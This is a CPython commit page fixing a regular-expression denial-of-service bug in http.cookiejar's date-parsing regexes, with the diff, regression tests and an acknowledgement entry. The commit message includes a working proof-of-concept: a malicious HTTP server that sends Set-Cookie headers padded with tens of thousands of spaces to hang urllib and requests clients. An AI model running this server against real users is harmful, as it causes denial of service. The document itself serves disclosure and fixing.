Skip to content

Commit cb60851

Browse files
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent d4d7920 commit cb60851

File tree

4 files changed

+27
-6
lines changed

4 files changed

+27
-6
lines changed

Lib/http/cookiejar.py

Lines changed: 12 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -213,10 +213,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
213213
(?::(\d\d))? # optional seconds
214214
)? # optional clock
215215
\s*
216-
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
216+
(?:
217+
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
218+
\s*
219+
)?
220+
(?:
221+
\(\w+\) # ASCII representation of timezone in parens.
217222
\s*
218-
(?:\(\w+\))? # ASCII representation of timezone in parens.
219-
\s*$""", re.X | re.ASCII)
223+
)?$""", re.X | re.ASCII)
220224
def http2time(text):
221225
"""Returns time in seconds since epoch of time represented by a string.
222226
@@ -286,9 +290,11 @@ def http2time(text):
286290
(?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
287291
)? # optional clock
288292
\s*
289-
([-+]?\d\d?:?(:?\d\d)?
290-
|Z|z)? # timezone (Z is "zero meridian", i.e. GMT)
291-
\s*$""", re.X | re. ASCII)
293+
(?:
294+
([-+]?\d\d?:?(:?\d\d)?
295+
|Z|z) # timezone (Z is "zero meridian", i.e. GMT)
296+
\s*
297+
)?$""", re.X | re. ASCII)
292298
def iso2time(text):
293299
"""
294300
As for http2time, but parses the ISO 8601 formats:

Lib/test/test_http_cookiejar.py

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -123,6 +123,13 @@ def test_http2time_garbage(self):
123123
"http2time(%s) is not None\n"
124124
"http2time(test) %s" % (test, http2time(test)))
125125

126+
def test_http2time_redos_regression_actually_completes(self):
127+
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
128+
# If we regress to cubic complexity, this test will take a very long time to succeed.
129+
# If fixed, it should complete within a fraction of a second.
130+
http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
131+
http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))
132+
126133
def test_iso2time(self):
127134
def parse_date(text):
128135
return time.gmtime(iso2time(text))[:6]
@@ -180,6 +187,12 @@ def test_iso2time_garbage(self):
180187
self.assertIsNone(iso2time(test),
181188
"iso2time(%r)" % test)
182189

190+
def test_iso2time_performance_regression(self):
191+
# If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
192+
# If fixed, it should complete within a fraction of a second.
193+
iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
194+
iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))
195+
183196

184197
class HeaderTests(unittest.TestCase):
185198

Misc/ACKS

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -245,6 +245,7 @@ Zach Byrne
245245
Vedran Čačić
246246
Nicolas Cadou
247247
Jp Calderone
248+
Ben Caller
248249
Arnaud Calmettes
249250
Daniel Calvelo
250251
Tony Campbell
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.

0 commit comments

Comments
 (0)
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy